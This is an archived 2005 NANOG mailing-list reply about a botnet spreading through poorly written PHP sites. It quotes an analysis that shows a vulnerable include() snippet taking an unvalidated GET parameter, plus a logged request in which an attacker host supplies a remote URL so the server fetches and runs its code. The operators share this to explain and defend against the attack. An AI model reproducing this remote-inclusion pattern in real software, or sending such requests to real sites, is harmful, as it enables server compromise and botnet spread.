Merit Network
Can't find what you're looking for? Search the Mail Archives.
  About Merit   Services   Network   Resources & Support   Network Research   News   Events   Home

Discussion Communities: Merit Network Email List Archives

North American Network Operators Group

Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical

RE: Re:Destructive botnet originating from Japan

  • From: Hannigan, Martin
  • Date: Fri Dec 23 19:54:40 2005

Title: RE: Re:Destructive botnet originating from Japan

You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)





 -----Original Message-----
From:   Barrett G. Lyon [mailto:blyon@prolexic.com]
Sent:   Fri Dec 23 19:21:47 2005
To:     nanog@merit.edu
Subject:        Re:Destructive botnet originating from Japan


Well it appears that bad code always seems to be the root of 
problems, according to our research today the problem appears to be 
caused by incorrectly written PHP applications that perform includes 
using a string without running any validation against the string:

index.php?test=test
$test=$_GET[test];
include("$test.php");

When the include executes the test string passed from the GET 
includes execution instructions:

       "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 
8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting 
IRC server) is spreading his code as the include is called, pulling 
and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this 
list, but it's pretty nasty.


-Barrett








Discussion Communities


About Merit | Services | Network | Resources & Support | Network Research
News | Events | Contact | Site Map | Merit Network Home


Merit Network, Inc.